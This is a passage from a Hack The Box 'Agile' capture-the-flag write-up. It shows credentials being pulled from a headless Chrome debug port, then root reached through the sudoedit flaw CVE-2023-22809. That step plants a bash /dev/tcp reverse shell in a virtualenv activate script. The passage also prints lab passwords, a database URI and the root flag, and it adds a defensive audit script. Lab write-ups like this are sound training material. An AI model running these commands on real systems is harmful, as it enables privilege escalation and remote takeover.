drwx------ 3 runner runner 4096 Jan 25 2023 .pki
drwxr-xr-x 3 runner runner 4096 Dec 13 2022 .pytest_cache
-rw-r--r-- 1 runner runner 128 Jan 23 2023 README.md
drwxr-xr-x 2 runner runner 4096 Jan 25 2023 __pycache__
-rw-r--r-- 1 runner runner 95 Jan 23 2023 requirements.txt
drwxr-xr-x 9 runner runner 4096 Mar 7 2023 superpass
drwxr-xr-x 3 runner runner 4096 Feb 6 2023 tests
-rw-r--r-- 1 runner runner 73 Jan 23 2023 wsgi-dev.py
corum@agile:/app/app-testing$ cat wsgi-dev.py
from superpass.app import app, dev

if __name__ == "__main__":
    dev()
corum@agile:/app/app-testing$

corum@agile:/app/app-testing/tests/functional$ ls -la
total 20
drwxr-xr-x 3 runner runner 4096 Feb 7 2023 .
drwxr-xr-x 3 runner runner 4096 Feb 6 2023 ..
drwxrwxr-x 2 runner runner 4096 Sep 29 09:30 __pycache__
-rw-r----- 1 dev_admin runner 34 Sep 29 09:30 creds.txt
-rw-r--r-- 1 runner runner 2663 Sep 29 09:30 test_site_interactively.py
corum@agile:/app/app-testing/tests/functional$

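28. We have no permission to read this file. Reading test_site_interactively.py shows that the creds.txt above does store account and password information.

29. Seeing this, it dawned on me: the identical-looking site on the test subdomain that we found in hosts earlier is actually the test site, and it still holds data...

30. Add this hostname to /etc/hosts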

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.203 test.superpass.htb" | sudo tee -a /etc/hosts
10.10.11.203 test.superpass.htb

31. Visit it

http://test.superpass.htb/

32. It redirects to the main domain automatically. Let's keep looking at how the tests are set up.

@pytest.fixture(scope="session")
def driver():
    options = Options()
    #options.add_argument("--no-sandbox")
    options.add_argument("--window-size=1420,1080")
    options.add_argument("--headless")
    options.add_argument("--remote-debugging-port=41829")
    options.add_argument('--disable-gpu')
    options.add_argument('--crash-dumps-dir=/tmp')
    driver = webdriver.Chrome(options=options)
    yield driver
    driver.close()

33. It looks like the port has to be forwarded over to take a look

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh -L 5000:localhost:5000 corum@10.10.11.203
corum@10.10.11.203's password:
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-60-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Last login: Wed Mar 8 15:25:35 2023 from 10.10.14.47
corum@agile:~$

34. Then browse to

http://127.0.0.1:5000/

35. This is the test site. At this point, though, I came across a more convenient method in another writeup

https://otrashoui.xyz/agile/#corum-to-edwards

from selenium import webdriver
from selenium.webdriver.chrome.options import Options

options = Options()
options.add_argument("--headless")
options.add_argument('--disable-gpu')
options.add_argument('--crash-dumps-dir=/tmp')
options.add_experimental_option("debuggerAddress", "127.0.0.1:41829")
driver = webdriver.Chrome(options=options)

driver.get("http://test.superpass.htb/vault")
print(driver.page_source)


corum@agile:~$ ls
user.txt
corum@agile:~$ touch test.py
corum@agile:~$ vim test.py


corum@agile:~$ python3 test.py
<html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🦸</text></svg>">
<title>SuperPassword 🦸</title>
<link rel="stylesheet" href="/static/css/josefinsans.css">
<link rel="stylesheet" href="/static/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<link href="/static/css/site.css" rel="stylesheet">
<link href="/static/css/all.min.css" rel="stylesheet">

<style> .htmx-indicator{opacity:0;transition: opacity 200ms ease-in;} .htmx-request .htmx-indicator{opacity:1} .htmx-request.htmx-indicator{opacity:1} </style></head>
<body class="d-flex flex-column min-vh-100">
<nav class="navbar navbar-expand-sm fixed-top">
<div class="container">
<span class="navbar-brand d-flex w-50 me-auto">🦸SuperPassword</span>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"><span class="navbar-toggler-icon"></span></button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav w-100 justify-content-end">
<li class="nav-item"><a class="nav-link" href="/">Home</a></li>

<li class="nav-item"><a class="nav-link" href="/vault">Vault</a></li>

<li class="nav-item"><a class="nav-link" href="/vault/export" target="_blank" rel="noopener noreferrer">Export</a></li>

<li class="nav-item"><a class="nav-link" href="/account/logout">Logout</a></li>

</ul>
</div>
</div>
</nav>



<div class="main_content">


<div class="container">
<div class="row">
<div class="col-sm-1"></div>
<div class="col-sm-10">
<div class="spacer30"></div>
<h1 class="vault-title">
<img src="/static/img/vault.png" alt="vault">
Welcome to your vault
<img src="/static/img/vault.png" alt="vault">
</h1>
<div class="spacer30"></div>
<table class="table table-striped table-hover">
<thead>
<tr>
<th></th>
<th scope="col" width="30%">Site</th>
<th scope="col" width="30%">Username</th>
<th scope="col" width="30%">Password</th>
</tr>
</thead>
<tbody hx-target="closest tr" hx-swap="outerHTML swap:.25s">

<tr class="password-row">
<td>
<a hx-get="/vault/edit_row/1" hx-include="closest tr"><i class="fas fa-edit"></i></a>
<a hx-delete="/vault/delete/1"><i class="fa-solid fa-trash"></i></a>
</td>
<td>agile</td>
<td>edwards</td>
<td>d07867c6267dcb5df0af</td>
</tr>

<tr class="password-row">
<td>
<a hx-get="/vault/edit_row/2" hx-include="closest tr"><i class="fas fa-edit"></i></a>
<a hx-delete="/vault/delete/2"><i class="fa-solid fa-trash"></i></a>
</td>
<td>twitter</td>
<td>dedwards__</td>
<td>7dbfe676b6b564ce5718</td>
</tr>


<tr class="add-password">
<td colspan="4">
<button hx-get="/vault/add_row" hx-swap="beforebegin swap:.25s" hx-target=".add-password" class="fade-me-out btn btn-primary" name="add_password">
<i class="fas fa-plus-circle"></i> Add a password</button>
<a class="btn btn-success" href="/vault/export" target="_blank" rel="noopener noreferrer" style="visibility: none;">
<i class="fa-solid fa-file-export"></i> Export</a>


</td>
</tr>

</tbody>
</table>
<div class="spacer30"></div>
</div>
<div class="col-sm-1"></div>
</div>
</div>


</div>

<footer class="mt-auto">
<div class="copyright">
Copyright © <a href="/">superpass.htb</a>
</div>
</footer>

<script src="/static/js/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="/static/js/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
<script src="/static/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
<script src="/static/js/htmx.min.js"></script>
<script src="/static/js/_hyperscript.min.js"></script>


</body></html>
corum@agile:~$

36. That's right: simply reuse the code from that test script and see what information comes back.

<td>agile</td>
<td>edwards</td>
<td>d07867c6267dcb5df0af</td>

<td>twitter</td>
<td>dedwards__</td>
<td>7dbfe676b6b564ce5718</td>

37. This reveals the passwords for 2 accounts. Log in with one of them and start testing.

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh edwards@10.10.11.203
edwards@10.10.11.203's password:
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-60-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Last login: Thu Mar 2 10:28:51 2023 from 10.10.14.23
edwards@agile:~$ id
uid=1002(edwards) gid=1002(edwards) groups=1002(edwards)
edwards@agile:~$

38. Here we find sudo rights that run as another user.

edwards@agile:~$ ls -la
total 32
drwxr-x--- 5 edwards edwards 4096 Feb 8 2023 .
drwxr-xr-x 5 root root 4096 Feb 8 2023 ..
lrwxrwxrwx 1 root root 9 Feb 6 2023 .bash_history -> /dev/null
-rw-r--r-- 1 edwards edwards 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 edwards edwards 3771 Jan 6 2022 .bashrc
drwx------ 2 edwards edwards 4096 Feb 8 2023 .cache
drwxr-xr-x 3 edwards edwards 4096 Feb 8 2023 .config
drwx------ 3 edwards edwards 4096 Feb 8 2023 .local
-rw-r--r-- 1 edwards edwards 807 Jan 6 2022 .profile
edwards@agile:~$
edwards@agile:~$ sudo -l
[sudo] password for edwards:
Matching Defaults entries for edwards on agile:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User edwards may run the following commands on agile:
(dev_admin : dev_admin) sudoedit /app/config_test.json
(dev_admin : dev_admin) sudoedit /app/app-testing/tests/functional/creds.txt
edwards@agile:~$

39. Carry out the exploitation

edwards@agile:~$ sudo -u dev_admin sudoedit /app/config_test.json
sudo: sudoedit doesn't need to be run via sudo
sudo: /app/config_test.json unchanged
edwards@agile:~$

{
"SQL_URI": "mysql+pymysql://superpasstester:VUO8A2c2#3FnLq3*a9DX1U@localhost/superpasstest"
}


edwards@agile:~$ sudo -u dev_admin sudoedit /app/app-testing/tests/functional/creds.txt
sudo: sudoedit doesn't need to be run via sudo
sudo: /app/app-testing/tests/functional/creds.txt unchanged
edwards@agile:~$

40. The steps above turned up some account credentials; following the guided hints, there is still another avenue.

41. Namely, check the sudo version.

edwards@agile:~$ sudo -V
Sudo version 1.9.9
Sudoers policy plugin version 1.9.9
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.9
Sudoers audit plugin version 1.9.9
edwards@agile:~$

42. Search for a vulnerability

sudo 1.9.9 exploit github

CVE-2023-22809

43. Start the exploitation

EDITOR='vim -- /app/venv/bin/activate' sudoedit -u dev_admin -g dev_admin /app/config_test.json


head /app/venv/bin/activate
# This file must be used with "source bin/activate" *from bash*
# you cannot run it directly
bash -c 'bash -i >& /dev/tcp/10.10.14.12/443 0>&1'

deactivate () {
# reset old environment variables
if [ -n "${_OLD_VIRTUAL_PATH:-}" ] ; then
PATH="${_OLD_VIRTUAL_PATH:-}"
export PATH
unset _OLD_VIRTUAL_PATH



edwards@agile:~$ ls -lh /app/venv/bin
total 1.4M
-rw-r--r-- 1 root dev_admin 8.9K Sep 30 08:51 Activate.ps1
-rw-rw-r-- 1 root dev_admin 2.0K Sep 30 08:51 activate
-rw-r--r-- 1 root dev_admin 902 Sep 30 08:51 activate.csh
-rw-r--r-- 1 root dev_admin 2.0K Sep 30 08:51 activate.fish
-rwxrwxr-x 1 root root 213 Sep 30 08:51 flask
-rwxr-xr-x 1 root root 222 Jan 24 2023 gunicorn
-rwxrwxr-x 1 root root 226 Sep 30 08:51 pip
-rwxrwxr-x 1 root root 226 Sep 30 08:51 pip3
-rwxrwxr-x 1 root root 226 Sep 30 08:51 pip3.10
-rwxrwxr-x 1 root root 226 Sep 30 08:51 py.test
-rwxrwxr-x 1 root root 226 Sep 30 08:51 pytest
lrwxrwxrwx 1 root root 7 Sep 30 08:51 python -> python3
lrwxrwxrwx 1 root root 16 Sep 30 08:51 python3 -> /usr/bin/python3
lrwxrwxrwx 1 root root 7 Sep 30 08:51 python3.10 -> python3
-rwxrwxr-x 1 root root 1.3M Jan 23 2023 uwsgi
edwards@agile:~$

edwards@agile:~$ EDITOR='vim -- /app/venv/bin/activate' sudoedit -u dev_admin /app/config_test.json
sudoedit: --: Permission denied
2 files to edit
sudoedit: /app/config_test.json unchanged
edwards@agile:~$
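
Added example, not part of the original writeup: a defender-side audit for the three conditions this step chains together, namely a sudo release in the CVE-2023-22809 range, an editor variable carrying a bare `--`, and a script sourced by privileged sessions that a non-root group can write. The function names are illustrative, and the affected range (1.8.0 through 1.9.12p1) comes from the upstream sudo advisory rather than from this page.

```shell
#!/bin/sh
# Added example (not from the original writeup): defender-side checks for the
# conditions chained in steps 41-43. Function names are illustrative.

# 0 = upstream version inside the CVE-2023-22809 range (1.8.0 .. 1.9.12p1),
# 1 = outside it, 2 = unparseable. Distributions backport the fix without
# changing the upstream number, so confirm a hit against the package changelog.
sudo_version_affected() {
    printf '%s\n' "$1" | awk -F'[.p]' '
        $0 !~ /^[0-9]+\.[0-9]+\.[0-9]+(p[0-9]+)?$/ { exit 2 }
        { key = $1 * 1000000 + $2 * 10000 + $3 * 100 + $4
          exit !(key >= 1080000 && key <= 1091201) }'
}

# 0 if an EDITOR / VISUAL / SUDO_EDITOR value carries a bare "--" word, the
# token that lets an extra path ride along in step 43.
editor_has_dashdash() {
    set -f                      # no globbing while word-splitting the value
    for word in $1; do
        if [ "$word" = "--" ]; then set +f; return 0; fi
    done
    set +f
    return 1
}

# 0 if a regular file is world-writable, or group-writable by a non-root
# group, like "-rw-rw-r-- root dev_admin ... activate" in the listing.
writable_by_nonroot() {
    [ -n "$(find -L "$1" -prune -type f \( -perm -0002 -o \
        \( -perm -0020 ! -group 0 \) \) -print 2>/dev/null)" ]
}

# Report on this host: sudo version, editor variables, then each path given.
audit_host() {
    ver=$(sudo -V 2>/dev/null | awk 'NR == 1 { print $3 }')
    if sudo_version_affected "$ver"; then
        echo "sudo $ver: upstream version in CVE-2023-22809 range"
    fi
    for var in SUDO_EDITOR VISUAL EDITOR; do
        eval "val=\${$var:-}"
        if editor_has_dashdash "$val"; then echo "$var contains a bare --"; fi
    done
    for f in "$@"; do
        if writable_by_nonroot "$f"; then echo "$f: writable by non-root"; fi
    done
}

# Pass the scripts that privileged sessions source, e.g. a venv's activate.
if [ "$#" -gt 0 ]; then audit_host "$@"; fi
```

Where sudo cannot be upgraded to 1.9.12p2 or later, the upstream advisory's workaround is a sudoers line such as `Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR"`, which stops sudoedit from honouring a user-supplied editor.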

44. At this point the reverse shell is obtained and the final flag is read.

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.203] 40908
bash: cannot set terminal process group (2794): Inappropriate ioctl for device
bash: no job control in this shell
root@agile:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@agile:~# cat /root/root.txt
cat /root/root.txt
42721be4ede62508404ba6007c390820
root@agile:~#

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/532


Aglie-htb-writeup
https://sh1yan.top/2024/09/30/Aglie-htb-writeup/
Author
shiyan
Published on
September 30, 2024
License